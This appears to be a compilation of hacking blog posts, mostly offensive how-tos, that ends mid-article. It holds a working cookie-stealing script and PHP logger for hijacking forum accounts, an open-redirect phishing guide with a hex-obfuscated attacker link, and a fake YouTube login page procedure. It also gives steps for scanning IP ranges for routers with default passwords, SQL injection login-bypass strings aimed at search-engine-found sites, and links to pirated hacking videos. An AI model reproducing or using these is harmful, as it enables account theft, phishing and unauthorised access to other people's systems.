WI-FI NETWORK HACKING TUTORIALS

WI-FI NETWORK HACKING TUTORIALS | 981 MB

■ ■ ■ CONTENTS ■ ■ ■

Hacking Videos-Part1 / videos_pt1 / 128 Bit Wep Cracking With Injection!.swf 13 MB

Hacking Videos-Part1 / videos_pt1 / Adding Modules to a Slax or Backtrack Live CD from Windows.swf 4.2 MB

Hacking Videos-Part1 / videos_pt1 / Basic Nmap Usage!.swf 8.3 MB

Hacking Videos-Part1 / videos_pt1 / BufferOverflowPart2-Shellcoding ByIDEspinner.avi 12.7 MB

Hacking Videos-Part1 / videos_pt1 / BufferOverflowPart3ExploitsByIDEspinner.avi 15.2 MB

Hacking Videos-Part1 / videos_pt1 / How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf 32.2 MB

Hacking Videos-Part1 / videos_pt1 / Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res).avi 121.5 MB

Hacking Videos-Part2 / A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf 2.8 MB

Hacking Videos-Part2 / Breaking WEP in 10 minutes.avi 27.6 MB

Hacking Videos-Part2 / Complete Hacking Video using Metasploit – Meterpreter.swf 12.5 MB

Hacking Videos-Part2 / Cracking a 128 bit WEP key (Auditor).swf 50.6 MB

Hacking Videos-Part2 / Cracking a 128 Bit Wep key + entering the cridentials.swf 22.1 MB

Hacking Videos-Part2 / Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf 2.5 MB

Hacking Videos-Part2 / Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf 4.3 MB

Hacking Videos-Part2 / Cracking WPA Networks (Auditor).swf 14.8 MB

Hacking Videos-Part2 / DoS attack against Windows FTP Server – DoS.avi 10 MB

Hacking Videos-Part2 / Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf 6.6 MB

Hacking Videos-Part2 / Exploiting some bugs of tools used in Windows.swf.swf 16 MB

Hacking Videos-Part2 / Exploiting weaknesses of PPTP VPN (Auditor).swf 5.5 MB

Hacking Videos-Part2 / Finding Rogue SMB File Shares On Your Network!.swf 5.5 MB

Hacking Videos-Part2 / Fun with Ettercap Filters!.swf 2.4 MB

Hacking Videos-Part2 / How to crack the local windows passwords in the SAM database .swf 6.8 MB

Hacking Videos-Part2 / How to sniff around switches using Arpspoof and Ngrep!.avi 3.2 MB

Hacking Videos-Part3 / Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf 3.3 MB

Hacking Videos-Part3 / BackTrack LiveCD to HD Installation Instruction Video .swf 7.1 MB

Hacking Videos-Part3 / Basic Tools for Wardriving!.swf 2.7 MB

Hacking Videos-Part3 / Bluesnarfer attack tool demonstration.swf 9.8 MB

Hacking Videos-Part3 / IDEspinner Buffer Overflows pt1.avi 2.5 MB

Hacking Videos-Part3 / IDEspinner Feature Addition pt2.avi 11.3 MB

Hacking Videos-Part3 / IDEspinnerDNS-PoisonRouting.avi 5 MB

Hacking Videos-Part3 / Install VNC Remotely!.avi 2.9 MB

Hacking Videos-Part3 / Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi 25.7 MB

Hacking Videos-Part3 / Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi 19.9 MB

Hacking Videos-Part3 / John The Ripper 1.7 password cracker Installation Instruction Video .swf 2.6 MB

Hacking Videos-Part3 / Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf 5.7 MB

Hacking Videos-Part3 / MAC Bridging with Windows XP and Sniffing!.swf 1.4 MB

Hacking Videos-Part3 / Mass De-Authentication using void11 (Auditor).swf 16.5 MB

Hacking Videos-Part3 / Metasploit Flash Tutorial!.swf 3.2 MB

Hacking Videos-Part3 / MITM Hijacking.wmv 52.3 MB

Hacking Videos-Part3 / Nmap Video Tutorial 2 Port Scan Boogaloo!.swf 13.4 MB

Hacking Videos-Part3 / Sniffing logins and passwords.avi 7.1 MB

Hacking Videos-Part4 / A Penetration Attack Reconstructed.avi 40.2 MB

Hacking Videos-Part4 / Bluesnarfing a Nokia 6310i hand set.avi 11.5 MB

Hacking Videos-Part4 / Cain to ARP poison and sniff passwords!.avi 1.7 MB

Hacking Videos-Part4 / Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi 71 MB

Hacking Videos-Part4 / Sniffing VoIP Using Cain!.swf 1.7 MB

Hacking Videos-Part4 / Snort Instruction video – howto install into backtrack.swf 10.6 MB

Hacking Videos-Part4 / SSH Dynamic Port Forwarding!.swf 3 MB

Hacking Videos-Part4 / Start a session and get interactive commandline access to a remote Windows box!.avi 5 MB

Hacking Videos-Part4 / Telnet Bruteforce.avi 18.9 MB

Hacking Videos-Part4 / Tunneling Exploits through SSH.avi 18.1 MB

Hacking Videos-Part4 / Use Brutus to crack a box running telnet!.avi 1.7 MB

Hacking Videos-Part4 / Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf 1.3 MB

Hacking Videos-Part4 / WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf 5.2 MB

Hacking Videos-Part4 / WMF File Code Execution Vulnerability With Metasploit!.swf 3.7 MB

Hacking Videos-Part4 / WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf 5.2 MB

Hacking Videos-Part5 / BackTrack LiveCD to HD Installation Instruction Video .swf 7.1 MB

Hacking Videos-Part5 / Basic Nmap Usage!.swf 8.3 MB

Hacking Videos-Part5 / Basic Tools for Wardriving!.swf 2.7 MB

Hacking Videos-Part5 / Bluesnarfer attack tool demonstration.swf 9.8 MB

Hacking Videos-Part5 / Bluesnarfing a Nokia 6310i hand set.avi 11.5 MB

Hacking Videos-Part5 / Breaking WEP in 10 minutes.avi 27.6 MB

Hacking Videos-Part5 / Complete Hacking Video using Metasploit – Meterpreter.swf 12.5 MB

Hacking Videos-Part5 / Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf 2.5 MB

Hacking Videos-Part5 / Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf 4.3 MB

Hacking Videos-Part5 / Cracking WPA Networks (Auditor).swf 14.8 MB

Hacking Videos-Part5 / DoS attack against Windows FTP Server – DoS.avi 10 MB

Hacking Videos-Part5 / Exploiting some bugs of tools used in Windows.swf.swf 16 MB

Hacking Videos-Part5 / How to crack the local windows passwords in the SAM database .swf 6.8 MB

Hacking Videos-Part5 / How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf 32.2 MB

Hacking Videos-Part5 / Install VNC Remotely!.avi 2.9 MB

Hacking Videos-Part5 / John The Ripper 1.7 password cracker Installation Instruction Video .swf 2.6 MB

Hacking Videos-Part5 / Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf 5.7 MB

Hacking Videos-Part5 / MAC Bridging with Windows XP and Sniffing!.swf 1.4 MB

Hacking Videos-Part5 / Metasploit Flash Tutorial!.swf 3.2 MB

Hacking Videos-Part5 / SSH Dynamic Port Forwarding!.swf 3 MB

Hacking Videos-Part5 / Start a session and get interactive commandline access to a remote Windows box!.avi 5 MB

http://hotfile.com/dl/42830916/3118e0e/Wif...part01.rar.html

http://hotfile.com/dl/42830915/cbd8cff/Wif...part02.rar.html

http://hotfile.com/dl/42830918/d9f6f53/Wif...part03.rar.html

http://hotfile.com/dl/42830917/f69016e/Wif...part04.rar.html

http://hotfile.com/dl/42830920/e65d4d5/Wif...part05.rar.html

http://hotfile.com/dl/42830924/4b63cfb/Wif...part06.rar.html

http://hotfile.com/dl/42830919/d42ad6e/Wif...part07.rar.html

http://hotfile.com/dl/42830922/dc39e14/Wif...part08.rar.html

http://hotfile.com/dl/42830921/ee7e5bc/Wif...part09.rar.html

http://hotfile.com/dl/42830923/b47b0bf/Wif...part10.rar.html

DSL Speed 6.0 Full

DSL Speed 6.0 Full | 5,38 MB

DSL Speed is a professional tool that will tweaks and optimize your DSL (e.g., ADSL, G.lite,IDSL,SDSL) connection speed up to max.

Features :
- Online verify your ISP's MTU and your DSL (ADSL) unique optimize value.
- Tweaks and optimize your DSL(ADSL) connection speed up to max, offline and online .
- Faster loading web pages.
- Tweaks DNS errors caching in windows 2000/XP.
- Tweaks ICS in windows 98/SE.
- New in V6.0: Spyware disconnect function - let you know which program tries to connect to the internet , and you can terminate the suspected spyware or simply add to black list.

Download Links:
Hotfile 
Uploading

WiFi Toolkit 2 - Added by http://www.netrdx.com/

WiFi Toolkit 2 | 233.50 MB

An important part of communication of most modern companies have wireless broadband data network. Networking allows you to configure local area networks within buildings and to establish radio links with remote offices for dozens of kilometers. They help to organize the urban strongholds networks, providing broadband Internet access for private companies and government agencies. In addition to these advantages, wireless networks developed a number of software and hardware control over traffic and safety management. To date, remove all questions of administration, now they are just as wired can be transparent for technicians and administrators.
The performance of radio are influenced by many factors, so to control the wireless network and manage more complex than wired. Until recently it was not possible to fully, with the help of staff resources to monitor data streams and to monitor the levels of incoming radio signals, so they had to face some difficulties when trying to determine the cause of an event in the network. Using advanced software and hardware monitoring and traffic analysis of wireless networks, these issues are successfully solved.

OS: Windows
Medician: Yes
Contents: Aircrack-NG, Essential NetTools,
inSSIDer, NetSetMan, WildPackets OmniPeek,
Sidejacking, SMAC, Vistumbler, WiFi Hopper,
Wireless Network Ignition, Wireshark

Download (Hotfile)
http://hotfile.com/dl/81637729/87fd39f/WiFi.Toolkit.2.part1.rar.html
http://hotfile.com/dl/81637733/9880fac/WiFi.Toolkit.2.part2.rar.html
http://hotfile.com/dl/81637635/6d4c294/WiFi.Toolkit.2.part3.rar.html

Mirror (FileServe)
http://www.fileserve.com/file/RppWsWm
http://www.fileserve.com/file/eBn5NTt
http://www.fileserve.com/file/8Dapzxc

Mirror (FileSonic)
http://www.filesonic.com/file/31016695
http://www.filesonic.com/file/31016723
http://www.filesonic.com/file/31017829

How to steal a remote computer's Cookies to hack ids

Hey,with this cookie logging trick you hack hack anyone’s account at any point of time you just have to do one thing,you gotto send send him to a link which has the potential to log cookies.To fast…… huh ?Ok lets go one by one.

Here’s what to do

1.First you have to create a file which can capture a person’s cookie.So follow the following process.

a.Copy the code which is given below .





<script>location.href=’http://www.hackosys.blogspot.com/cookielogger.php?cookie=’+escape(document.cookie)</SCRIPT>


b.Now you have to change “http://hackosys.blogspot.com” to your your site.
c.Remember one thing you should not upload the files into a directory.
d.Now open notepad and paste the script in it and save it as fun.gif


2.Ok,now you gotto create a key logger which can store the captured cookie file and the script is given below.This is a .php script (quite simple huh ?)


<?php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>


a.Now just save this as “cookielogger.php” .Do not edit anything.

3.Now you just have to create a plane empty text document and save it as logfile.txt
4.Now you are ready with the cookie stealing process.Now you have to get registered with a free webhosting site such as www.110mb.com or www.t35.com with supports .php file hosting.
5.After you have done this you have 75% finished it.Now upload the files (not into a directory) and save it .You gotto upload it like this

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
6.Now test it by placing it in a forum and insert this code in the signature or a post or where you can Smile !OR else you can just blindly use this in you forum by replacing the ones in red with your website URL.

[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif
7.So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt
8.And something like this will be stored in your “logfile.txt”
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9


9.If you want to know how to use it you gotto download the firefox addon and with this you can finish the job neatly
Thats it !

Exploiting Redirect Vulnerabilities

Phishing is usually considered to be most effective when it’s combined with social engineering, the hacker term for human manipulation. One way phishing can be combined with social engineering is through the exploitation of redirect vulnerabilities. This article will demonstrate to you what redirect vulnerabilities are, how to spot them, and how they can be exploited.

So first things first. What is a redirect vulnerability? A redirect vulnerability is when a webpage uses a script to redirect you to somewhere (usually another page on the website), but they write that script in such a way that it allows a hacker to manipulate it to send you to an external page instead of an internal one. There are many types of redirect vulnerabilities, but we’ll be looking at the most basic type here for now. Example: let’s say we’re logging in to webpage that has this url:
Code:

http://www.example.com/login.php?dest=members/index.html

Let’s have a look at the url. It’s all looking pretty ordinary up to login.php, but look one step after that. See the dest=members/index.html? members/index.html is the path to the index page for logged in members, so you can determine that dest=members/index.html is a parameter that is being used by the login.phpscript to redirect users to the member index page after a successful login. Now if the creator of the login.php script was very security conscious, they’d make sure that the dest field could never point to a url that’s not an approved destination. However, if he didn’t know aboutredirect vulnerabilities, he would just write the script so that it would redirect the user to whatever address dest pointed to. In order to find which one we’re dealing with for this website, we can change the dest parameter and see how thescript responds. For instance:
Code:

http://www.example.com/login.php?dest=http://www.google.com

If this page is vulnerable to redirect vulnerabilities, this it should send us to google after we log in. If not, it will generate some sort of error condition and take you to a default page. So if we change the address as specified above, log in, and find ourselves looking at google instead of example.com, then we know it’s vulnerable toredirect vulnerabilities.
Now that you know what redirect vulnerabilities are, can you see how they can be applied to phishing? Let me create a scenario to give you an idea of how redirect vulnerabilities can be used to increase the effectiveness of phishing. Imagine yourself to be a student at a university. You have a school website with the address http://www.myschool.com, and you log in to all your school services (such as mail, course info, etc) through the url
Code:

www.sys.myschool.com/login.php?service=

where the service parameter points to the address of the service being accessed, as demonstrated in the following urls

Code:

http://www.portal.myschool.com/login.php?service=sys/mail.php


or
http://www.portal.myschool.com/login.php?service=sys/courseInfo.php

Phishers have been targeting students of your school lately, so your system administrators have sent everyone an email telling them to check the url of every webpage they log into with their school account to make sure it’s an actual school page and not aphishing page. A hacker is aware of this, and realizing that this advice will give the you and the other students a false sense of security when you’re on pages that are actual school pages, set out looking for a way to get students to access hisphishing page from within the school login system itself. He sees the above urls and recognizes their potential to be vulnerable to redirect exploitation and creates a phishing page that looks exactly like your school’s page that is displayed to you when your login fails. Being a phishing page, it sends him all the login credentials of everyone who logs in through it. Once he knows that the login script is indeed vulnerable, he creates a link to his phishing page from the school login page, hoping that students will log in to the school through his link, get redirected to his fake page, enter their information again without realizing that they left the school page, and then become redirected back to their school page without even noticing that anything out of the ordinary had happened. He starts out with a link like this:
Code:

http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php

However, he realizes that some of the more observant students might see the external address in the url and be too wary to enter their information, so he changes his url into its hexidecimal representation, either by memory or using a tool like this one: http://secworm.net/showthread.php?tid=3, and achieves an ordinary-looking url like this one:
Code:

http://www.portal.myschool.com/login.php?service=%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d%2f%66%61%6b%6 ?5%50%61%67%65%2e%70%68%70

This url gives no indication that it actually redirects students to the hacker’s phishing page, and since you see your school’s domain in the beginning, you and the students think nothing of it. The hacker then sends this link along with an email making the reader want to log in to the student database and steals all their passwords.

Hopefully this will help you understand the basics of redirect vulnerabilities and how they can be used to increase the effectiveness of phishing.

How To Hack A Youtube Account

Learn how to hack a youtube account


Are you curious to “hack youtube account” well then this post is just for you,Most people ask me to tell us the easiest way to hack youtube,so here is the most easy way to hack you account i.e. phishing

Today we will focus on the easiest way i.e Fake login page

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmailyoutube,friendster etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


First of all download:Youtube fake login page



PROCEDURE:

1.once you have downloded youtube fake login page,now extract contents in a folder
2.In that ,find (CTRL+F) ‘http://hackingaday.com’ then change it to your destined URL but don’t forget ‘\’.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term “action=” now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com , because i know about that site quite well.
6.Then upload the contents into a directory
7.For that,after creating an id you should go to file manager and upload all these files.
8.Then just got to youtube.htm and try out whether its working .

After you type in the file , a password file named pass.txt will be created in the same directory.Then you can see what username and password you have entered.

thx to hacking a day for fake login page

How to Bypass all Webfilters

There are times when when we are forced to use proxy and we know , with proxy many sites are blocked, But here is a way to bypass all the Web filters. When a site is blocked , you can use this method to bypass the block!


Lets pretend for a moment that the Internet is made up of 26 websites, A-Z. The web filter blocks your browser from accessing sites X-Z, but not sites A-W. Simply make the browser think you’re going to A-W. There are a variety of ways to do this:

Proxy Servers:

This is a list of HTTP proxies. These sites may not be up forever, so you may need to search for “free HTTP proxy” or “public proxy servers” or other similar terms.
Proxy server lists:

1.http://www.aliveproxy.com/
2.http://www.multiproxy.org/
3.http://www.publicproxyservers.com/index.html
4.http://www.tehbox.com/proxy
5.http://www.proxz.com/
6.http://www.proxy4free.com/index.html
7.http://free-proxies.com/

Now that you have a list of proxies, you would open IE (internet explorer) and click on Tools > Internet Options > Connections > LAN Settings > Advanced. Enter the address and port of one of the servers from the list in the proper area (http) and make sure the “use a proxy server for your LAN” option is selected. Remember to replace the proxy and port at your terminal to the original when you’re done.

Note: Some proxies listed may not work, and this method may decrease your surfing speed. By trying various entries, you’ll find one that works, or works faster.

The infamous translation trick:

Go to a web page translation site and use their services to “translate a page to English” thus accessing the blocked page through their trusted site.

You’ll notice that several translation sites are blocked, but by using less popular ones, this method can still be effective. Here is a list of some translation services. Again, these sites may not be up forever, so you may need to search for them.

1http://babelfish.altavista.com/
2.http://world.altavista.com/
3.http://translation.langenberg.com/
4.http://freetranslation.com/web.thm

URL Scripting:

URL scripting is the easiest method. It works on a select few web filters and is based on the same principal as the translation trick. By typing and address like www.yahoo.com@www.restricted_site.com the filter will not go into effect as it recognizes the trusted site (in this case yahoo.com)


Other tricks:

Simply open the command prompt and type:

Ping restricted.com ? restricted.com obviously being the restricted site

At this point you can take down the IP address (ex. 216.109.124.73) and enter it into the browser. If access to the command prompt is also restricted, see “How to bypass restrictions to get to thecommand prompt.” If this article has been taken from information leak, then know that it involves anything from opening the browser, selecting view > source, then saving it as X.bat and opening it to opening a folder or browser and typing in the location of cmd.exe depending on the OS. I will not go into further, as this a completely different topic.

Use https://restrictedsite.com/as referring to it as a secured site may confuse the filter.

Note: These are ancient methods that many new filters defend against, but still may be applicable in your situation. If not, a little history never hurt anyone.

Web based Proxies:

Another one of the easier, yet effective methods include web based proxies. These are simple in the fact that you just enter the restricted address and surf! Some of these have some restrictions, like daily usage limits, etc but you can also use another proxy (perhaps one that sucks, like a text only) to bypass their restrictions as well. Here is a list of some:

1.http://proxify.com/
2.http://www.anonymizer.com/index.cgi
3.http://www.guardster.com/
4.http://anonymouse.ws/anonwww.html
5.http://www.the-cloak.com/login.html
6.https://www.megaproxy.com/freesurf
7.http://www.anonymizer.ru/
8.https://nadaily.com/cgi-bin/nph-proxyb.cgi
9.http://www.userbeam.de/cgi-bin/nph-userbeam.cgi
10.http://www.free2.surffreedom.com/nph-free.cgi

Proxy Programs:

There are many proxy programs that allow you to surf anonymously that are more or less based on the same topics we’ve covered here. I’ve added them just to cover the topic thoroughly:

1.http://www.hotscripts.com/Detailed/28480.html
2.http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
3.http://www.orangatango.com/home/index.ie.html
4.http://www.steganos.com/
5.http://www.anonymization.net//
 ? toolbar that requires admin rights to install

Making your own CGI proxy server:

Making your own proxy server may come in handy, but I personally find that simply uploading a .txt file/w a list of proxies to a free host makes for a much easier and headache free solution. If you don’t know PERL, there is code out there to help you set it up. Check out these sites for more info:

1.http://httpbridge.sourceforge.net/
2.http://www.jmarshall.com/tools/cgiproxy
3.http://www.manageability.org/blog/stuff/open-source-personal-proxy-servers-written-in-java/view



Admin Access:

When all else fails, you can simply take over the PC and alter or delete the damn filter. This method varies according to the OS (operating system) you are dealing with. Please see “Hacking Windows NT” for more information. If this tutorial has been taken from information leak, then I will go as far as to say it involves booting the PC in another OS, copying the SAM file and cracking it using a program like saminside or LC5 rather than start a whole new topic within one.

Hacking Internet Cafe To Get Unlimited Time

 I had some troubles with my computer, so it's been a while since my last post on this blog. I spent some time in internet cafe, playing LAN games with my friends. We used to pay only few bucks and then play for hours for free, without getting noticed, using a little trick. You don't need any software or hacking skills to do this trick. It's very simple and anyone with a bit computer knowledge can do it. Lets start.




How to disable the timer on the computers in Internet Cafe and play with your friends as long as you want.



1. First of all create a new Text Document. Then write CMD in it, and then save it as anything.bat. (Make sure you're file is .bat)

2. Now find your batch (.bat) file and run it. If you've done it correctly, you'll see that CMD (Command Prompt) will open.



3. Now, write in the CMD: cd\windows (This will change the directory to WINDOWS). Then type regedit and regedit editor should open.

4. Now navigate to:



HKEY_CURRENT_USER>AppEvents>Software>Classes>Microsoft>Windows>Current Version>Internet Settings>Policies>System

5. Then on the right pane where it says Disable Taskmanager, right click on it and scroll down to modify, then change the value of it to 0. Then open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and disable the Internet Cafe's timer.



If you did this right, you're done. Happy Hacking ;)



Do you have questions, comments, or suggestions? Feel free to post a comment

How to Hack an Ethernet ADSL Router

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.




Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.



Before you proceed, you need the following tool in the process



Angry IP Scanner



Here is a detailed information on how to exploit the vulnerability of an ADSL router.



Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.



Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.



Suppose your IP is 117.192.195.101, you can set the range something as 117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.

Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.

I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools

Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.

Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.



Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.







If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.





The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.



Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.



Warning!

All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

.

List of all the SQL Injection Strings

One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems .




First SEARCH the following Keywords in Google or any Search Engine:



admin\login.asp

login.asp



with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable



INJECTION STRINGS: How to use it?



This is the easiest part…very simple



On the login page just enter something like



user:admin (you dont even have to put this.)

pass:’ or 1=1–



or



user:’ or 1=1–

admin:’ or 1=1–



Some sites will have just a password so



password:’ or 1=1–



In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.



The one I am interested in are quick access to targets



PROGRAM



i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string



combo example:



admin:’ or a=a–

admin:’ or 1=1–



And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string



Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever



inurl:login.asp

index of:/admin/login.asp



like this: index of login.asp



result:


http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search



17,000 possible targets trying various searches spews out plent more



Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so



http://www.somesite.com/login.asp

http://www.another.com/admin/login.asp



and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter



1) A Proxy list

2) My Target IP list

3) My Combo list

4) Start.



Now I dont want to go into problems with users using Ares..thing is i know it works for me…



Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.



There you go you should have access to your vulnerable target by now



Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes



user=’ or 1=1– just as quick as login process



Combo List



There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.



As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don’t Forget to click on the Confirmation Link given in that Email.

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.




1. Direct connections via the Internet



These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.



2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.







Figure 1: Common SQL injection vulnerabilities found using WebInspect.



3. Enumerating the SQL Server Resolution Service



Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.



4. Cracking SA passwords



Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.



5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.







Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.



6. SQL injection

SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.



Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.



7. Blind SQL injection



These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.



8. Reverse engineering the system



